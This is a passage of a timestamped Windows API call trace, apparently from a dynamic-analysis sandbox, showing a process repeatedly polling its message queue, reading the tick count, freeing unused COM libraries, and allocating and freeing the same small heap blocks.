wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.512] GetTickCount () returned 0x1d27a [0066.512] GetTickCount () returned 0x1d27a [0066.512] CoFreeUnusedLibraries () [0066.512] GetTickCount () returned 0x1d27a [0066.512] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.512] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.512] GetTickCount () returned 0x1d27a [0066.512] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.512] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.512] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.512] GetTickCount () returned 0x1d27a [0066.512] GetTickCount () returned 0x1d27a [0066.512] CoFreeUnusedLibraries () [0066.512] GetTickCount () returned 0x1d27a [0066.512] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.512] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.512] GetTickCount () returned 0x1d27a [0066.512] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.513] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.513] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.513] GetTickCount () returned 0x1d27a [0066.513] GetTickCount () returned 0x1d27a [0066.513] CoFreeUnusedLibraries () [0066.513] GetTickCount () returned 0x1d27a [0066.513] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.513] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.513] GetTickCount () returned 0x1d27a [0066.513] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.513] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.513] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.513] GetTickCount () returned 0x1d27a [0066.513] GetTickCount () returned 0x1d27a [0066.513] CoFreeUnusedLibraries () [0066.513] GetTickCount () returned 0x1d27a [0066.513] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.513] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.513] GetTickCount () returned 0x1d27a [0066.513] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.513] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.513] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.513] GetTickCount () returned 0x1d27a [0066.514] GetTickCount () returned 0x1d27a [0066.514] CoFreeUnusedLibraries () [0066.514] GetTickCount () returned 0x1d27a [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.514] GetTickCount () returned 0x1d27a [0066.514] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.514] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.514] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.514] GetTickCount () returned 0x1d27a [0066.514] GetTickCount () returned 0x1d27a [0066.514] CoFreeUnusedLibraries () [0066.514] GetTickCount () returned 0x1d27a [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.514] GetTickCount () returned 0x1d27a [0066.514] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.514] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.514] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.514] GetTickCount () returned 0x1d27a [0066.514] GetTickCount () returned 0x1d27a [0066.514] CoFreeUnusedLibraries () [0066.514] GetTickCount () returned 0x1d27a [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.514] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.514] GetTickCount () returned 0x1d27a [0066.515] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.515] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.515] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.515] GetTickCount () returned 0x1d27a [0066.515] GetTickCount () returned 0x1d27a [0066.515] CoFreeUnusedLibraries () [0066.515] GetTickCount () returned 0x1d27a [0066.515] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.515] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.515] GetTickCount () returned 0x1d27a [0066.515] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.515] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.515] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.515] GetTickCount () returned 0x1d27a [0066.515] GetTickCount () returned 0x1d27a [0066.515] CoFreeUnusedLibraries () [0066.515] GetTickCount () returned 0x1d27a [0066.515] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.515] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.515] GetTickCount () returned 0x1d27a [0066.516] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.516] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.516] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.516] GetTickCount () returned 0x1d28a [0066.516] GetTickCount () returned 0x1d28a [0066.516] CoFreeUnusedLibraries () [0066.516] GetTickCount () returned 0x1d28a [0066.516] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.516] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.516] GetTickCount () returned 0x1d28a [0066.516] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.516] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.516] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.516] GetTickCount () returned 0x1d28a [0066.516] GetTickCount () returned 0x1d28a [0066.516] CoFreeUnusedLibraries () [0066.516] GetTickCount () returned 0x1d28a [0066.516] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.517] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.517] GetTickCount () returned 0x1d28a [0066.517] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.517] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.517] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.517] GetTickCount () returned 0x1d28a [0066.517] GetTickCount () returned 0x1d28a [0066.517] CoFreeUnusedLibraries () [0066.517] GetTickCount () returned 0x1d28a [0066.517] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.517] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.517] GetTickCount () returned 0x1d28a [0066.517] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.517] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.517] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.517] GetTickCount () returned 0x1d28a [0066.517] GetTickCount () returned 0x1d28a [0066.517] CoFreeUnusedLibraries () [0066.517] GetTickCount () returned 0x1d28a [0066.517] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.517] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.517] GetTickCount () returned 0x1d28a [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.518] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.518] GetTickCount () returned 0x1d28a [0066.518] GetTickCount () returned 0x1d28a [0066.518] CoFreeUnusedLibraries () [0066.518] GetTickCount () returned 0x1d28a [0066.518] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.518] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.518] GetTickCount () returned 0x1d28a [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.518] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.518] GetTickCount () returned 0x1d28a [0066.518] GetTickCount () returned 0x1d28a [0066.518] CoFreeUnusedLibraries () [0066.518] GetTickCount () returned 0x1d28a [0066.518] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.518] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.518] GetTickCount () returned 0x1d28a [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.518] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.518] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.518] GetTickCount () returned 0x1d28a [0066.518] GetTickCount () returned 0x1d28a [0066.518] CoFreeUnusedLibraries () [0066.519] GetTickCount () returned 0x1d28a [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.519] GetTickCount () returned 0x1d28a [0066.519] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.519] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.519] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.519] GetTickCount () returned 0x1d28a [0066.519] GetTickCount () returned 0x1d28a [0066.519] CoFreeUnusedLibraries () [0066.519] GetTickCount () returned 0x1d28a [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.519] GetTickCount () returned 0x1d28a [0066.519] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.519] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.519] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.519] GetTickCount () returned 0x1d28a [0066.519] GetTickCount () returned 0x1d28a [0066.519] CoFreeUnusedLibraries () [0066.519] GetTickCount () returned 0x1d28a [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.519] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.519] GetTickCount () returned 0x1d28a [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.520] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.520] GetTickCount () returned 0x1d28a [0066.520] GetTickCount () returned 0x1d28a [0066.520] CoFreeUnusedLibraries () [0066.520] GetTickCount () returned 0x1d28a [0066.520] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.520] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.520] GetTickCount () returned 0x1d28a [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.520] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.520] GetTickCount () returned 0x1d28a [0066.520] GetTickCount () returned 0x1d28a [0066.520] CoFreeUnusedLibraries () [0066.520] GetTickCount () returned 0x1d28a [0066.520] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.520] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.520] GetTickCount () returned 0x1d28a [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.520] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.521] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.521] GetTickCount () returned 0x1d28a [0066.521] GetTickCount () returned 0x1d28a [0066.521] CoFreeUnusedLibraries () [0066.521] GetTickCount () returned 0x1d28a [0066.521] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.521] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.521] GetTickCount () returned 0x1d28a [0066.521] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.521] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.521] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.521] GetTickCount () returned 0x1d28a [0066.521] GetTickCount () returned 0x1d28a [0066.521] CoFreeUnusedLibraries () [0066.521] GetTickCount () returned 0x1d28a [0066.521] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.521] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.521] GetTickCount () returned 0x1d28a [0066.521] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.521] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.521] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.521] GetTickCount () returned 0x1d28a [0066.521] GetTickCount () returned 0x1d28a [0066.521] CoFreeUnusedLibraries () [0066.521] GetTickCount () returned 0x1d28a [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.522] GetTickCount () returned 0x1d28a [0066.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.522] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.522] GetTickCount () returned 0x1d28a [0066.522] GetTickCount () returned 0x1d28a [0066.522] CoFreeUnusedLibraries () [0066.522] GetTickCount () returned 0x1d28a [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.522] GetTickCount () returned 0x1d28a [0066.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.522] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.522] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.522] GetTickCount () returned 0x1d28a [0066.522] GetTickCount () returned 0x1d28a [0066.522] CoFreeUnusedLibraries () [0066.522] GetTickCount () returned 0x1d28a [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.522] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.522] GetTickCount () returned 0x1d28a [0066.523] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.523] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.523] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.523] GetTickCount () returned 0x1d28a [0066.523] GetTickCount () returned 0x1d28a [0066.523] CoFreeUnusedLibraries () [0066.523] GetTickCount () returned 0x1d28a [0066.523] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.523] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.523] GetTickCount () returned 0x1d28a [0066.523] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.523] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.523] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.523] GetTickCount () returned 0x1d28a [0066.523] GetTickCount () returned 0x1d28a [0066.523] CoFreeUnusedLibraries () [0066.523] GetTickCount () returned 0x1d28a [0066.523] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.523] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.523] GetTickCount () returned 0x1d28a [0066.523] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.524] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.524] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.524] GetTickCount () returned 0x1d28a [0066.524] GetTickCount () returned 0x1d28a [0066.524] CoFreeUnusedLibraries () [0066.524] GetTickCount () returned 0x1d28a [0066.524] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.524] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.524] GetTickCount () returned 0x1d28a [0066.524] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.524] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.524] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.524] GetTickCount () returned 0x1d28a [0066.524] GetTickCount () returned 0x1d28a [0066.524] CoFreeUnusedLibraries () [0066.524] GetTickCount () returned 0x1d28a [0066.524] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.524] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.524] GetTickCount () returned 0x1d28a [0066.524] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.524] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.524] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.524] GetTickCount () returned 0x1d28a [0066.524] GetTickCount () returned 0x1d28a [0066.524] CoFreeUnusedLibraries () [0066.525] GetTickCount () returned 0x1d28a [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.525] GetTickCount () returned 0x1d28a [0066.525] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.525] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.525] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.525] GetTickCount () returned 0x1d28a [0066.525] GetTickCount () returned 0x1d28a [0066.525] CoFreeUnusedLibraries () [0066.525] GetTickCount () returned 0x1d28a [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.525] GetTickCount () returned 0x1d28a [0066.525] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.525] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.525] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.525] GetTickCount () returned 0x1d28a [0066.525] GetTickCount () returned 0x1d28a [0066.525] CoFreeUnusedLibraries () [0066.525] GetTickCount () returned 0x1d28a [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.525] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.525] GetTickCount () returned 0x1d28a [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.526] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.526] GetTickCount () returned 0x1d28a [0066.526] GetTickCount () returned 0x1d28a [0066.526] CoFreeUnusedLibraries () [0066.526] GetTickCount () returned 0x1d28a [0066.526] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.526] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.526] GetTickCount () returned 0x1d28a [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.526] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.526] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.526] GetTickCount () returned 0x1d28a [0066.526] GetTickCount () returned 0x1d28a [0066.526] CoFreeUnusedLibraries () [0066.526] GetTickCount () returned 0x1d28a [0066.526] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.526] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 